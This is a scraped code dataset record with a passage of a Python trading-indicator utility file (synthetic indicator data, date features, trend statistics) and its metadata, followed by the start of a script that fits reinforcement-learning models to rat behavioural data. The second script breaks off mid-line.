df[\"n1_ema_long\"+ suffix] + 1, df['n1_ema_short' + suffix])\n df['n1_super_trend_direction+ suffix'] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] - 1, df['low'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] + 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, df[\"n1_ema_long\"+ suffix] - 1, df['n1_ema_short' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df[\"n1_ema_short\"+ suffix] + 5, df['high'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 20, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, 
df['low'])\n\n # OPENING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 25, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] +1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, False, df['n1_super_trend_direction' + suffix])\n df['high'] = np.where(df.index >= t, df['n1_ema_short' + suffix] +2, df['high'])\n\n df['close'] = np.where(df.index >= t + 10, df[\"close\"] - 1, df['close'])\n\n # CLOSING SHORT\n t = t + 100\n df['n1_ema_short' + suffix] = np.where(df.index >= t, 30, df['n1_ema_short' + suffix])\n df['n1_ema_long' + suffix] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['n1_ema_long' + suffix])\n df['n1_super_trend_direction' + suffix] = np.where(df.index >= t, True, df['n1_super_trend_direction' + suffix])\n df['low'] = np.where(df.index >= t, df['n1_ema_short' + suffix] -1, df['low'])\n\n df[\"ema_short\"+ suffix] = df[\"n1_ema_short\"+ suffix]\n df[\"ema_long\"+ suffix] = df[\"n1_ema_long\"+ suffix]\n df[\"super_trend_direction\"+ suffix] = df[\"n1_super_trend_direction\"+ suffix]\n\n df['syntheticsuperreversal' + suffix] = True\n\n df.set_index(['timestamp'], inplace=True, drop=True)\n\n # keep only the requested indicators\n if keep_only_requested_indicators:\n for column in list(df.columns):\n if column not in keep_indicators:\n df.drop(columns=[column], inplace=True)\n\n # drop \"timestamp\" as it is redundant with index\n if \"timestamp\" in list(df.columns):\n df.drop(columns=[\"timestamp\"], inplace=True)\n \n return df\n \ndef make_date(df, date_field):\n \"Make sure `df[date_field]` is of the right date type.\"\n field_dtype = df[date_field].dtype\n if isinstance(field_dtype, pd.core.dtypes.dtypes.DatetimeTZDtype):\n field_dtype = np.datetime64\n if not np.issubdtype(field_dtype, np.datetime64):\n df[date_field] = pd.to_datetime(df[date_field], infer_datetime_format=True)\n\ndef add_temporal_indicators(df, field_name, time=False):\n \"Helper function that adds columns relevant to a date in the column `field_name` of `df`.\"\n\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n\n if field_name not in df.columns and field_name != df.index.name:\n print(\"[add_temporal_indicators] {} is not present among the columns {} or in the index {}\".format(field_name, df.columns, df.index.name))\n return df\n\n # if the datefield is the index of the dataframe, we create a temporary column\n field_to_drop = False\n if field_name == df.index.name:\n field_name = 'DateTmp'\n df[field_name] = df.index\n field_to_drop = True\n\n make_date(df, field_name)\n\n field = df[field_name]\n prefix = \"\" #ifnone(prefix, re.sub('[Dd]ate$', '', field_name))\n attr = ['Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear', 'Is_month_end', 'Is_month_start',\n 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start']\n if time: attr = attr + ['Hour', 'Minute', 'Second']\n # Pandas removed `dt.week` in v1.1.10\n week = field.dt.isocalendar().week.astype(field.dt.day.dtype) if hasattr(field.dt, 'isocalendar') else field.dt.week\n for n in attr: df[prefix + n] = getattr(field.dt, n.lower()) if n != 'Week' else week\n mask = ~field.isna()\n df[prefix + 'Elapsed'] = np.where(mask, field.values.astype(np.int64) // 10 ** 9, np.nan)\n if field_to_drop: df.drop(field_name, axis=1, inplace=True)\n\n return df\n\ndef remove_features(df, features):\n for 
feature in features:\n try:\n df.drop(feature, axis=1, inplace=True)\n except KeyError as feature:\n print(\"{}. Columns are {}\".format(feature, df.columns))\n return df\n\ndef normalize_column_headings(df):\n # Change all column headings to be lower case, and remove spacing\n df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]\n return df\n\ndef get_trend_info(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend_1d'] = tmp['trend_1d'].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp['trend_1d'] == 1) & (tmp['shift_trend_1d'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp['trend_1d'] == 0) & (tmp['shift_trend_1d'] == 1), 1, 0)\n\n # how many times the trend is up\n trend_counted = tmp['trend_1d'].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return trend_ratio, true_positive, true_negative, false_positive, false_negative\n\ndef get_stats_for_trend_up(df, n_forward_days):\n tmp = df.copy()\n\n indicator = \"trend_\"+str(n_forward_days)+\"d\"\n if indicator not in tmp.columns:\n tmp = compute_indicators(tmp, [indicator])\n\n # how many times the trend is up for d+n_forward_days\n trend_counted = tmp[indicator].value_counts(normalize=True)\n trend_ratio = 100 * trend_counted[1]\n\n return trend_ratio\n\ndef get_stats_on_trend_today_equals_trend_tomorrow(df):\n tmp = pd.concat([df['close']], axis=1, keys=['close'])\n tmp = compute_indicators(tmp, [\"trend_1d\"])\n tmp['shift_trend'] = tmp[\"trend_1d\"].shift(-1)\n tmp.dropna(inplace=True)\n\n tmp['true_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 1), 1, 0)\n tmp['true_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_positive'] = np.where((tmp[\"trend_1d\"] == 1) & (tmp['shift_trend'] == 0), 1, 0)\n tmp['false_negative'] = np.where((tmp[\"trend_1d\"] == 0) & (tmp['shift_trend'] == 1), 1, 0)\n\n # how many times trend today = trend tomorrow\n true_positive = 100*tmp['true_positive'].value_counts(normalize=True)[1]\n true_negative = 100*tmp['true_negative'].value_counts(normalize=True)[1]\n false_positive = 100*tmp['false_positive'].value_counts(normalize=True)[1]\n false_negative = 100*tmp['false_negative'].value_counts(normalize=True)[1]\n\n return true_positive, true_negative, false_positive, false_negative\n\ndef shift(df, indicator, shift):\n if isinstance(shift, str):\n shift = int(shift)\n \n df[indicator] = df[indicator].shift(shift)\n return df\n\ndef remove_missing_values(df):\n df['inf'] = 0\n for col in df.columns:\n df['inf'] = np.where((df[col] == np.inf) | (df[col] == -np.inf), 1, df['inf'])\n\n df = df.drop(df[df.inf == 1].index)\n df = df.drop(['inf'], axis=1)\n\n df.replace([np.inf, -np.inf], np.nan)\n # Drop the NaNs\n df.dropna(axis=0, how='any', inplace=True)\n\n return df\n\n\ndef remove_duplicates(df):\n df.drop_duplicates(inplace=True)\n return df\n", "repo_name": 
"cedfactory/fdp", "sub_path": "src/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 38151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "parse.parse", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 16, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "attribute"}, {"api_name": "stockstats.StockDataFrame.retype", "line_number": 167, "usage_type": "call"}, {"api_name": "stockstats.StockDataFrame", "line_number": 167, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 178, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 215, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 216, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 217, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 218, "usage_type": "call"}, {"api_name": "parse.parse", "line_number": 219, "usage_type": "call"}, {"api_name": "finta.TA.SMA", "line_number": 232, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 232, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 241, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 241, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 249, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 249, "usage_type": "attribute"}, {"api_name": "ta.momentum.williams_r", "line_number": 264, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 264, "usage_type": "attribute"}, {"api_name": "finta.TA.WMA", "line_number": 278, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 278, "usage_type": "name"}, {"api_name": "finta.TA.SMA", "line_number": 282, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 282, "usage_type": "name"}, {"api_name": "finta.TA.EMA", "line_number": 286, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 286, "usage_type": "name"}, {"api_name": "finta.TA.WMA", "line_number": 290, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 290, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 294, "usage_type": "call"}, {"api_name": "finta.TA.BBANDS", "line_number": 307, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 307, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 308, "usage_type": "call"}, {"api_name": "ta.momentum.rsi", "line_number": 319, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ta.momentum.stochrsi", "line_number": 330, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 332, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 332, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 334, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 334, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 349, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 349, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 372, 
"usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 372, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 374, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 374, "usage_type": "attribute"}, {"api_name": "ta.momentum.StochRSIIndicator", "line_number": 376, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 376, "usage_type": "attribute"}, {"api_name": "ta.volatility.AverageTrueRange", "line_number": 400, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 400, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 415, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 415, "usage_type": "attribute"}, {"api_name": "ta.momentum.awesome_oscillator", "line_number": 436, "usage_type": "call"}, {"api_name": "ta.momentum", "line_number": 436, "usage_type": "attribute"}, {"api_name": "ta.volatility.BollingerBands", "line_number": 456, "usage_type": "call"}, {"api_name": "ta.volatility", "line_number": 456, "usage_type": "attribute"}, {"api_name": "ta.trend.sma_indicator", "line_number": 460, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 460, "usage_type": "attribute"}, {"api_name": "ta.trend.SMAIndicator", "line_number": 494, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 494, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 524, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 536, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 539, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 541, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 543, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 552, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 556, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 564, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 574, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 581, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 583, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 591, "usage_type": "call"}, {"api_name": "finta.TA.WILLIAMS", "line_number": 606, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 606, "usage_type": "name"}, {"api_name": "finta.TA.STOCH", "line_number": 609, "usage_type": "call"}, {"api_name": 
"finta.TA", "line_number": 609, "usage_type": "name"}, {"api_name": "finta.TA.STOCHD", "line_number": 612, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 612, "usage_type": "name"}, {"api_name": "finta.TA.ER", "line_number": 615, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 615, "usage_type": "name"}, {"api_name": "finta.TA.STC", "line_number": 618, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 618, "usage_type": "name"}, {"api_name": "finta.TA.ADX", "line_number": 621, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 621, "usage_type": "name"}, {"api_name": "finta.TA.ROC", "line_number": 624, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 624, "usage_type": "name"}, {"api_name": "finta.TA.MOM", "line_number": 627, "usage_type": "call"}, {"api_name": "finta.TA", "line_number": 627, "usage_type": "name"}, {"api_name": "ta.trend.ema_indicator", "line_number": 672, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 672, "usage_type": "attribute"}, {"api_name": "ta.trend.ema_indicator", "line_number": 673, "usage_type": "call"}, {"api_name": "ta.trend", "line_number": 673, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 691, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 695, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 699, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 701, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 705, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 706, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 708, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 712, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 713, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 714, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 721, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 722, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 723, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 724, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 749, "usage_type": "attribute"}, {"api_name": "numpy.datetime64", "line_number": 750, "usage_type": "attribute"}, {"api_name": "numpy.issubdtype", "line_number": 751, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 751, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 752, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 782, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 782, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 801, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 806, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 808, "usage_type": "call"}, {"api_name": "numpy.where", 
"line_number": 809, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 837, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 842, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 843, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 844, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 845, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 865, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 865, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 870, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 870, "usage_type": "attribute"}]} +{"seq_id": "74087888168", "text": "import numpy as np\nimport numpy.random as random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport copy\nimport os\n\nclass participant():\n \"\"\"\n class to keep values of participant, predict selection, and update values\n according to reward for Single Context Experiments\n\n key attribute:\n self.values, list, in the form of [[V_AL, V_AR], [V_BL, V_BR]]. Only the\n two values related to the input sequence will be used. Based on the mode,\n two or four values will be upgraded.\n\n self.alphas, learning rate matrix, list, in the form of [[a_AL, a_AR], [a_BL, a_BR]],\n each alpha is a constant and not updated throughout the process.\n\n self.beta, the linear parameter of stockxxxxx, should be between 0 and 1?\n\n Since values and alphas are in the form of x_ij, where i/j = 0 for A/L, or 1 for B/R,\n the calculation can be made by using index of list, which, hopefully, will be easier.\n\n self.mode, 2 or 4, marking if only 2 values will be updated, or all four values will be\n updated, as suggested by different model\n\n self.values_history, list of all past values, so a list of list (which is of list again)\n \"\"\"\n\n def __init__(self, name=None, values=[[1,0],[0.5,0.5]], alphas=[[0.3,0.1],[0.1,0.3]], beta=1.0, mode=2):\n if name is None:\n self.name = \"participant\"\n else:\n self.name = str(name)\n\n self.values = values\n #print(\"Init Values: {v}\".format(v = self.values))\n self.values_history = [[[],[]],[[],[]]]\n self.alphas = alphas\n self.beta = beta\n\n self.possible_sequence = [\"A\", \"B\"]\n self.possible_response = [\"L\", \"R\"]\n\n assert mode in [1,2,4], \"Unknown mode, set mode to 1, 2 or 4!\"\n self.mode = mode\n\n def getProbabilities(self, sequence):\n # Calculate P_L and P_R from values\n V_L, V_R = self.values[self.possible_sequence.index(sequence)]\n Z = self.beta * (V_L - V_R)\n P_L = 1 / (1 + np.exp(-1 * Z))\n return P_L, 1-P_L\n\n def makeSelection(self, sequence):\n P_L, P_R = self.getProbabilities(sequence)\n if random.uniform(0, 1) <= P_L:\n return 0, \"L\"\n else:\n return 1, \"R\"\n\n def upgradeValues(self, sequence, response, reward):\n self.values_history[0][0].append(self.values[0][0])\n self.values_history[1][0].append(self.values[1][0])\n self.values_history[1][1].append(self.values[1][1])\n self.values_history[0][1].append(self.values[0][1])\n\n idx_seq = self.possible_sequence.index(sequence)\n idx_seq_re = abs(1 - idx_seq)\n idx_res = self.possible_response.index(response)\n idx_res_re = abs(1 - idx_res)\n\n self.values[idx_seq][idx_res] = self.values[idx_seq][idx_res] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (reward - self.values[idx_seq][idx_res])\n\n if self.mode >= 2:\n self.values[idx_seq_re][idx_res] = self.values[idx_seq_re][idx_res] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (reward - 
self.values[idx_seq_re][idx_res])\n\n if self.mode == 4:\n self.values[idx_seq][idx_res_re] = self.values[idx_seq][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (1 - reward - self.values[idx_seq][idx_res_re])\n\n self.values[idx_seq_re][idx_res_re] = self.values[idx_seq_re][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (1 - reward - self.values[idx_seq_re][idx_res_re])\n\n\nclass probabilityCalculator():\n def __init__(self, subject_no=9, mode=2, assist_alpha=True):\n data_filename = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/Result/\" \\\n \"SingleContext_Rat\" + str(subject_no) + \".csv\"\n self.df = pd.read_csv(data_filename, sep=\",\")\n subject_name = data_filename.split(\"_\")[-1]\n self.subject_name = subject_name.split(\".\")[0]\n self.mode=mode\n self.subject_no = subject_no\n self.assist_alpha = assist_alpha\n\n def _calcEngine(self, alpha_starts = [[0,0],[0,0]], alpha_ends=[[1,1],[1,1]], step=0.1):\n result_df = pd.DataFrame(columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n name = self.subject_name\n alphas = [[1,2],[3,4]]\n for i in [0,1]:\n for j in [0,1]:\n alphas[i][j] = np.arange(np.max([alpha_starts[i][j],0]),\n np.min([1,alpha_ends[i][j]]), step)\n if not self.assist_alpha:\n alphas[0][1] = np.array([0])\n alphas[1][0] = np.array([0])\n print(\"alphas created\")\n\n for i, alpha_00 in enumerate(alphas[0][0]):\n print(\"Alpha_00: {v:.3f}, {i}/{j}\".format(v=alpha_00, i=i+1, j=len(alphas[0][0])))\n for alpha_01 in alphas[0][1]:\n for alpha_10 in alphas[1][0]:\n for alpha_11 in alphas[1][1]:\n alphas2use = [[alpha_00, alpha_01],[alpha_10, alpha_11]]\n probability_sum = 0.0\n\n if self.subject_no <= 16:\n p = participant(name=name, values=[[1,0],[1,0]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n else:\n p = participant(name=name, values=[[0,1],[0,1]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n\n #print(\"Alphas: {a}\".format(a=alphas2use))\n for i in range(len(self.df)):\n seq_trial = self.df[\"Sequence\"].iloc[i]\n res_trial = self.df[\"Response\"].iloc[i]\n reward = self.df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n prob_trial = p.getProbabilities(seq_trial)\n probability_sum = probability_sum + np.log(prob_trial[p.possible_response.index(res_trial)])\n p.upgradeValues(seq_trial, res_trial, reward)\n\n df_try = pd.DataFrame([[alpha_00, alpha_01, alpha_10, alpha_11, probability_sum]],\n columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n result_df = result_df.append(df_try)\n\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].values[0],result_df[\"Alpha_01\"].loc[idx].values[0]],\\\n [result_df[\"Alpha_10\"].loc[idx].values[0],result_df[\"Alpha_11\"].loc[idx].values[0]]]\n return best_alphas, result_df\n\n\nrootpath = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/RL_Model\"\nif not os.path.exists(rootpath):\n os.mkdir(rootpath)\n\n#for subject_no in np.arange(12,13,1):\nsubject_all = np.arange(9, 25, 1)\nsubject_all = subject_all[subject_all != 18]\nfor subidx, subject_no in enumerate(subject_all):\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n for mode in [1,2,3,4]:\n print(\"=\"*30)\n print(\"Subject {s}, {i}/15; mode: {m}\".format(s=subject_no, i=subidx+1, m=mode))\n if mode == 1:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=2, 
assist_alpha=False)\n elif mode == 3:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=4, assist_alpha=False)\n else:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=mode, assist_alpha=True)\n\n alpha_starts = [[0, 0], [0, 0]]\n alpha_ends = [[1, 1], [1, 1]]\n for i, step in enumerate([0.1,0.02,0.004,0.001]):\n print(\"Cycle {i}...\".format(i=i+1))\n best_alphas, result_df = Pcalculator._calcEngine(alpha_starts=alpha_starts, alpha_ends=alpha_ends, step=step)\n print(best_alphas)\n filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle{i}.csv\".format(s=subject_no, m=mode, i=i+1))\n with open(filename, \"w\") as f:\n f.write(result_df.to_csv(index=False))\n alpha_starts = np.array(best_alphas) - step\n alpha_ends = np.array(best_alphas) + step\n\n\n###################################################33\n# Output results\ncolumns = [\"Subject\", \"N_Trials\",\n \"Mode1_LnLikelyhood\", \"Mode1_LnLikelyhood_Pertrial\",\n \"Mode1_Alpha_00\",\"Mode1_Alpha_01\", \"Mode1_Alpha_10\",\"Mode1_Alpha_11\",\n \"Mode2_LnLikelyhood\", \"Mode2_LnLikelyhood_Pertrial\",\n \"Mode2_Alpha_00\",\"Mode2_Alpha_01\", \"Mode2_Alpha_10\",\"Mode2_Alpha_11\",\n \"Mode3_LnLikelyhood\", \"Mode3_LnLikelyhood_Pertrial\",\n \"Mode3_Alpha_00\",\"Mode3_Alpha_01\", \"Mode3_Alpha_10\",\"Mode3_Alpha_11\",\n \"Mode4_LnLikelyhood\", \"Mode4_LnLikelyhood_Pertrial\",\n \"Mode4_Alpha_00\",\"Mode4_Alpha_01\", \"Mode4_Alpha_10\",\"Mode4_Alpha_11\"]\ndf_sum = pd.DataFrame(columns=columns)\n\nfor subject_no in subject_all:\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n\n session_df_file = os.path.join(\"/media/zhemengwu/Gigantic Data/SingleContextSequence\",\n \"Result\", \"SingleContext_Rat{s}.csv\".format(s=subject_no))\n session_df = pd.read_csv(session_df_file, sep=\",\")\n session_df = session_df.loc[session_df[\"Response\"] != \"N\"]\n sub_name = \"Rat_{s}\".format(s=subject_no)\n n_trials = len(session_df)\n values = [sub_name, n_trials]\n\n for mode in [1,2,3,4]:\n print(\"=\" * 30)\n print(\"Subject {s}, mode: {m}\".format(s=subject_no, m=mode))\n\n # get mode2use and best-alphas\n if mode in [1,3]:\n mode2use = mode + 1\n else:\n mode2use = mode\n\n alpha_filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle4.csv\".format(s=subject_no, m=mode))\n result_df = pd.read_csv(alpha_filename, sep=\",\")\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].median(), result_df[\"Alpha_01\"].loc[idx].median()], \\\n [result_df[\"Alpha_10\"].loc[idx].median(), result_df[\"Alpha_11\"].loc[idx].median()]]\n # apend values for df_sum\n values.append(result_df[\"Ln_Likelyhood\"].max())\n values.append(result_df[\"Ln_Likelyhood\"].max() / n_trials)\n values.append(result_df[\"Alpha_00\"].loc[idx].median())\n values.append(result_df[\"Alpha_01\"].loc[idx].median())\n values.append(result_df[\"Alpha_10\"].loc[idx].median())\n values.append(result_df[\"Alpha_11\"].loc[idx].median())\n\n # re-calculate values\n if subject_no <= 16:\n rat = participant(name=sub_name, values=[[1,0],[1,0]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n else:\n rat = participant(name=sub_name, values=[[0,1],[0,1]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n seqA_X, seqA_Y = [], []\n seqB_X, seqB_Y = [], []\n for i in range(len(session_df)):\n seq_trial = 
